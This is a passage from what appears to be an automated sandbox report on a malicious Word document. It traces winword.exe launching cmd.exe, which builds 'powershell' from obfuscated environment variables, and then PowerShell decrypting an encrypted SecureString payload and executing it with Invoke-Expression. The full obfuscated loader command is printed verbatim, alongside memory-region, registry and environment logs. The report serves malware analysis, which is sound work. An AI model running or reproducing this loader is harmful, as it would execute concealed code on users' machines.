DUAMgA5AGYANwA5AGUANQAwADkAZQA5ADIAZQAyADMAMQAyADkANQA2AGEAZABhADQAZAAyADIAZAAxAGUAOAAzAGQANwBlAGMAZgA0ADMANQA4AGUAZgBjAGMANAA2ADcAYgA5ADYAOQAyAGYAMgAxAGIAOQA2ADkAOQA3ADYAZgAwADUAZgBhAGUANABiADgANQA4ADQAMgA0ADMAMABmAGIAZAA4ADAANgAzAGUAOAAxAGYAYgA3AGUAMQA4AGUANgA5ADEAZgBiADUAYQA1AGMAOABjADAAMwBjAGIAOQA4ADUANABlADkAOAA2ADMAZgBjAGMAYwBkAGEAYwA0ADMAZAA2ADMAZQAyADcAYwAyAGIANABlAGEAMQBlAGMANwAyADkAOABjADcAYwAxADUAZgAxADYANgBkADkAYwA1AGMAYgBiADkAOQBjAGQAYwA2AGIANgBhADQAYwA1ADMAMQAzAGUAMAAzAGEAYQA3AGEANgA2AGUAZQBmADMAYQBmADUANwA0ADUAZgA1ADMAMAAwADUAZAA4ADQAOQA0AGMAYwBlADQAYgA1ADQANAA0AGEAMQA1ADMAOQBiADUAZAA5ADQAMQBlAGUANwAyAGUAOQA3ADQANQBiAGEANwA4ADcANQAzADMANwA1ADMAYQBmAGQAYwBiADMAYwA2AGMAOAAxAGMAYwA5AGUAOAAwAGMAZQBmAGEANgA3AGIAMQAyAGEAMQA5AGEANwA2AGIAMwA4AGUAMgA1AGYANQBmADgAZAA2ADcANgBkAGQAMAA0ADMAMAA3ADkAOAA3ADQAMwAzADAAYgAwADgAZgBhADQAMgAyADcAZgAwADIAYgA2ADgAOAA1ADgAZAA2AGEAYQAyAGIAOABiADMANAAzAGIAOQA1ADAAMAAyAGQANQBiADAAMgBkADUAYgA3ADcAZQAxADIAOQAwADcANwAwAGUAMgBiADcANAAxAGYAZgA3ADkAMwBjADEAOAAxADEAOQA3AGMAZgBiADIANgA4ADEAZgBkADIAOABmADcAZQA3ADUAOAA5AGQAYwA3ADUAZAAzADAAOQBhAGIANwBmAGIAMQBlAGIAZgAxADEAYQBiADMAZQAxAGUAMAA4ADEANwA2ADAAOQAyAGIAMwBlADAAMABhADIAOQBiADUAYgBhADkAYwA0AGUAOQA0ADcAZgAzADYAZQAyADAAYwBkADEAMgA4ADIAMABlAGMAZgAzADIANwBkAGIAOQBjADYAYwA5ADQAYwAzADIAMgBkADcAZgA2AGEAMgA4ADEAOAAyADIAZAA0ADMAMgBmADUAMABlADkAYwAwAGUANwBjAGIANwAwAGMAYgAzAGMAZQBiAGQAYgBiAGUAYwA3ADQANwA3ADIAMwAzADUA' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb48 |
| Parent PID | 0x968 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0009ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0040ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00597fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x00720fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000730000 | 0x00730000 | 0x01b2ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001b30000 | 0x01b30000 | 0x01e72fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01e80000 | 0x0214efff | Memory Mapped File | Readable |
|
|
|
- |
| cmd.exe | 0x4acb0000 | 0x4ad08fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winbrand.dll | 0x7fef5e70000 | 0x7fef5e77fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xb60, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4acb0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76cd0000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76ce6d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x76ce23d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76cd8290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76ce17e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-03-29 15:42:49 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 109980 |
|
1 |
Environment (88)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
17 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = XGUfViTjCEjwSVO |
|
1 | |
| Get Environment String | name = =ZHGHTLTuB&&set |
|
1 | |
| Get Environment String | name = DAXAIPvZQicL |
|
2 | |
| Get Environment String | name = =p&&set |
|
1 | |
| Get Environment String | name = vwiYoBzE |
|
2 | |
| Get Environment String | name = =o^w&&set |
|
1 | |
| Get Environment String | name = NwmclOIWlPPfrXs |
|
1 | |
| Get Environment String | name = =YtuPEnjH&&set |
|
1 | |
| Get Environment String | name = mESEbjHwWp |
|
2 | |
| Get Environment String | name = =! |
|
2 | |
| Get Environment String | name = !&&set |
|
2 | |
| Get Environment String | name = zkOiRaLmZdHljEQ |
|
1 | |
| Get Environment String | name = =XajFzihkNzuSY&&set |
|
1 | |
| Get Environment String | name = YJwaSiYTQtqK |
|
2 | |
| Get Environment String | name = =e^r&&set |
|
1 | |
| Get Environment String | name = pflmiDDErkSdkk |
|
2 | |
| Get Environment String | name = fTvSPumjwc |
|
2 | |
| Get Environment String | name = =s&&set |
|
1 | |
| Get Environment String | name = iwaQfiAAaFLEdGO |
|
1 | |
| Get Environment String | name = =GdUcFsiGa&&set |
|
1 | |
| Get Environment String | name = iwpiikIEcScOE |
|
2 | |
| Get Environment String | name = =he&&set |
|
1 | |
| Get Environment String | name = zRBwSiVAaTKc |
|
2 | |
| Get Environment String | name = =ll&&! |
|
1 | |
| Get Environment String | name = !! |
|
5 | |
| Get Environment String | name = ! "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl] |
|
1 | |
| Get Environment String | name = %DAXAIPvZQicL%, result_out = p |
|
1 | |
| Get Environment String | name = %vwiYoBzE%, result_out = ow |
|
1 | |
| Get Environment String | name = %mESEbjHwWp%, result_out = p |
|
1 | |
| Get Environment String | name = %pflmiDDErkSdkk%, result_out = ow |
|
1 | |
| Get Environment String | name = %YJwaSiYTQtqK%, result_out = er |
|
1 | |
| Get Environment String | name = %fTvSPumjwc%, result_out = s |
|
1 | |
| Get Environment String | name = %iwpiikIEcScOE%, result_out = he |
|
1 | |
| Get Environment String | name = %zRBwSiVAaTKc%, result_out = ll |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = %XGUfViTjCEjwSVO%, value = ZHGHTLTuB |
|
1 | |
| Set Environment String | name = %DAXAIPvZQicL%, value = p |
|
1 | |
| Set Environment String | name = %vwiYoBzE%, value = ow |
|
1 | |
| Set Environment String | name = %NwmclOIWlPPfrXs%, value = YtuPEnjH |
|
1 | |
| Set Environment String | name = %mESEbjHwWp%, value = p |
|
1 | |
| Set Environment String | name = %zkOiRaLmZdHljEQ%, value = XajFzihkNzuSY |
|
1 | |
| Set Environment String | name = %YJwaSiYTQtqK%, value = er |
|
1 | |
| Set Environment String | name = %pflmiDDErkSdkk%, value = ow |
|
1 | |
| Set Environment String | name = %fTvSPumjwc%, value = s |
|
1 | |
| Set Environment String | name = %iwaQfiAAaFLEdGO%, value = GdUcFsiGa |
|
1 | |
| Set Environment String | name = %iwpiikIEcScOE%, value = he |
|
1 | |
| Set Environment String | name = %zRBwSiVAaTKc%, value = ll |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 |
Process #3: powershell.exe
873
158
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell "inVOKE-EXPResSION(([runtiMe.InTeRoPSErVIceS.MArsHAl]::PtRtOsTRiNgbstr([runtimE.INtEROPSerVIcEs.MarsHAl]::seCuRestRiNgTobstR($('76492d1116743f0423413b16050a5345MgB8AG0AdABWAHUAYwA1AFUAWQB2ADgAZgBOAGUASgBHAE4AegAwAFUATQBnAEEAPQA9AHwAYgAyAGIANQBiADgAMABkADMAYQBjAGIAYQA2ADgAOQAxADEAMAA4AGEAZQBjADEAZQBmADkANgAwADUAOQBjAGQANwA1AGYAOAA1ADIAMgAzAGYAMABlAGQAOQA2ADcAZgA1ADEAMAAzADQAZAA0ADAAZgBlADQANAA4ADAANAA1AGIAZQAxADMAMQAwAGYAMgA0ADgAZQA4ADUAZgAxADIAOAAyAGMAOQAwADkANAAzADUANgBlAGEAYwAzADIAOQBhADIANgAxAGEAOQBjAGYANQAyAGUAOABiAGIANQBiADkAMwA3AGYAYQA4ADkAOQBmADYAOAA2AGIANwBiADQAYwA1AGIAOQBiADQAMQA5AGUAZQAwADgAYgAzADEANQA1ADEAZQA3ADkAZABkADQAMQAzADgAZQBhADAAMgA2AGQAZABhADEAOABkAGIAMQBiADEAOABhAGEAMAA2AGIAYwA2AGIAMwA3AGQAZgA4AGYAOQAzAGIANwBjADIAMgAyAGMAOABlADIAMgAyAGUAOAA0AGYAYwBjADMAYwA3ADAAZQAxADUAYQA4ADAAMQBhADIAMwA0ADYAYwBmAGMAYwBjAGQAMwBmADgAMQBiAGYAZABkADAAMwBmADgANwBmAGIANABlADkANQBhADcAMQA0ADQAZAA5ADcANQAzAGQANQBiAGMAOAAyAGEAYwAwADAAMwA5ADcAYwA2AGMANAAwADIAZAAzADEAYQAxADcAYQAyADQAYgBlADQAZQA4ADcAZQBmAGMAYgBiADcAMAAzAGUANAA1ADMAZgBjADAAZQAwAGEAZQAxAGEAOAA1ADEAYgA4AGUAMABhADQAOAA1AGMANgA1AGUAZAA2ADUAMwAzAGUAOQAwADMAYgA2ADMAZQBlAGQAZQA2ADEANQAwADkAZgBmAGQANgA3ADQANAA2AGEAMAA3AGQAZgBjADMAZAA1AGIAYgA1ADkAZgBjAGMAYgBlADgAOAAxAGUAOQBiAGEAZgBiADQAYwBiADEAOQA3ADcAYQBhAGMAZgBlAGQAMAA5AGUAYQAxAGYAMQAyAGIANwAwADEAMABiAGYAMwA1ADQAMQBiAGMAOQBiADIAZQA5AGIANABkADYAZAA5ADYAZgA3ADYAYgA1ADQAMQBlADQANQBmADYAMQA0ADcANQBlADEAZQBiADgAMwA3AGQANgA0ADUAZgAyADUAMwA1ADAAYQA1AGIANgA5ADUANwAyAGQAZQA0AGIAYwA1AGYAYQBiADIANwBmADgAMABmADkAOABiAGMANQA4ADcANABkAGEANgAzAGUAMwBhADgAMQAzADEANwBkADkAOABjADAAZQA1ADUAYQA2ADIAYwAxADAANQBjADUAZgBhADkAZAA3AGEANgA4ADcAMQA2ADgAYwBmAGEAMgBkADkAYgA4AGIAYgAyAGQAOAA0ADQAZQAyADYAMAA3AGEAMQAyADQAMABmADMAYgBhAGMAZABjAGIAYwBhAGEANwBjADkAOQA3ADYANQBhADUAYgBjADMANwBkADQAZgBiADkAMgBkAGIAMAAzADkANAAzADUANwAxADgAZgAwADMAOAAxAGYAMwBjADcAYQA5ADAAMAA5ADAAMgAyAGEAZAAwAGUAOAA2ADMANwBlAGQAYQA1ADcAOABmAGEANwA2ADkANgAxADQAYgBlAGQAYQAzADIAZgA5AGUAMgA0ADIAMQA2ADgAMwBjADgANQA1ADkAOQAxADIANgA5ADYAMwA2ADgAYgA1ADAAOQBhADYANABhADYAMQBiADkAMgA5AGQAYgBjADkAYwBhADkANgA5ADcAMAAzAGMANQBhADIAMAA5AGEAYwBiADYAZAAyADUAZQAxADcAMABjAGEANgBkAGYAYwBkADAAYwBhAGUAMABjAGQAYgAzAGQAZABjAGYAZAA2AGYANQAxADQAYQA0AGYANAAyAGYAYQAxADEANgBkADQAYwA0ADgAOABmAGQAOAAwAGEAZgA3AGUAOAAxADIAYgBiAGMAMwA2ADQAMABkADAAMQAyAGIAZABhADgAYQBmADIANAAyADMAOABjAGUANAAyADMAYQBjAGYANgA0AGEAYwBjAGIAMwAxAGUANQBmADEANwBmAGQAYQBmAGIAZgBiADcAYwAxADUAYwBiAGUAMABmADkANwBiADIAOQAyAGIAYwAxAGMAYgAwADEAMgA5ADMAYQBhAGIANwA4AGYAYQA5ADEAMQBiADkAYwBiAGQAYQAwAGMAMwBkAGQAZABmADkAOQA2ADMAMQBmADYAYwA5ADQANgBkAGEANgBlAGIAYQBmADQAMQAzADIAMwA4AGMANQA1AGYAMgAzAGYAZAAxADIAYQAzAGYAMAA3AGIAOABkAGYANwA5ADkAZgAyADUAMwAxAGIAOQA3ADYANQA1AGIANABlAGIAMAA3ADMAMwBmAGYANwA0AGYAOQBlADgAZQBkAGQANgA2ADcAOABmADcAZABmADYAYgAzADIAMwA0ADEAMQA4ADkAYwBmADMAZQBmADIANQAwADYAYwAyAGUAZgA4AGQAOQBhADcAMAA0ADkANwBmAGIANQBjADUANwAzADMAZgBlADcAZAAyAGMAMQBhADgANgA0ADgAZQBmAGMAYQAzADQAMwBkADUAMgA5AGYANwA5AGUANQAwADkAZQA5ADIAZQAyADMAMQAyADkANQA2AGEAZABhADQAZAAyADIAZAAxAGUAOAAzAGQANwBlAGMAZgA0ADMANQA4AGUAZgBjAGMANAA2ADcAYgA5ADYAOQAyAGYAMgAxAGIAOQA2ADkAOQA3ADYAZgAwADUAZgBhAGUANABiADgANQA4ADQAMgA0ADMAMABmAGIAZAA4ADAANgAzAGUAOAAxAGYAYgA3AGUAMQA4AGUANgA5ADEAZgBiADUAYQA1AGMAOABjADAAMwBjAGIAOQA4ADUANABlADkAOAA2ADMAZgBjAGMAYwBkAGEAYwA0ADMAZAA2ADMAZQAyADcAYwAyAGIANABlAGEAMQBlAGMANwAyADkAOABjADcAYwAxADUAZgAxADYANgBkADkAYwA1AGMAYgBiADkAOQBjAGQAYwA2AGIANgBhADQAYwA1ADMAMQAzAGUAMAAzAGEAYQA3AGEANgA2AGUAZQBmADMAYQBmADUANwA0ADUAZgA1ADMAMAAwADUAZAA4ADQAOQA0AGMAYwBlADQAYgA1ADQANAA0AGEAMQA1ADMAOQBiADUAZAA5ADQAMQBlAGUANwAyAGUAOQA3ADQANQBiAGEANwA4ADcANQAzADMANwA1ADMAYQBmAGQAYwBiADMAYwA2AGMAOAAxAGMAYwA5AGUAOAAwAGMAZQBmAGEANgA3AGIAMQAyAGEAMQA5AGEANwA2AGIAMwA4AGUAMgA1AGYANQBmADgAZAA2ADcANgBkAGQAMAA0ADMAMAA3ADkAOAA3ADQAMwAzADAAYgAwADgAZgBhADQAMgAyADcAZgAwADIAYgA2ADgAOAA1ADgAZAA2AGEAYQAyAGIAOABiADMANAAzAGIAOQA1ADAAMAAyAGQANQBiADAAMgBkADUAYgA3ADcAZQAxADIAOQAwADcANwAwAGUAMgBiADcANAAxAGYAZgA3ADkAMwBjADEAOAAxADEAOQA3AGMAZgBiADIANgA4ADEAZgBkADIAOABmADcAZQA3ADUAOAA5AGQAYwA3ADUAZAAzADAAOQBhAGIANwBmAGIAMQBlAGIAZgAxADEAYQBiADMAZQAxAGUAMAA4ADEANwA2ADAAOQAyAGIAMwBlADAAMABhADIAOQBiADUAYgBhADkAYwA0AGUAOQA0ADcAZgAzADYAZQAyADAAYwBkADEAMgA4ADIAMABlAGMAZgAzADIANwBkAGIAOQBjADYAYwA5ADQAYwAzADIAMgBkADcAZgA2AGEAMgA4ADEAOAAyADIAZAA0ADMAMgBmADUAMABlADkAYwAwAGUANwBjAGIANwAwAGMAYgAzAGMAZQBiAGQAYgBiAGUAYwA3ADQANwA3ADIAMwAzADUA' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb60 |
| Parent PID | 0xb48 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B64
0x
B68
0x
B6C
0x
B70
0x
B74
0x
B78
0x
BB8
0x
BC4
0x
BC8
0x
BCC
0x
8FC
0x
924
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x00170000 | 0x00173fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x00180000 | 0x0019ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00330000 | 0x0035ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x00360000 | 0x00363fff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x00370000 | 0x003d5fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x00670fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00682fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0069ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x01c2ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01d2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01d30fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d5ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01deffff | Private Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x01df0000 | 0x01df2fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01f5efff | Pagefile Backed Memory | Readable |
|
|
|
- |
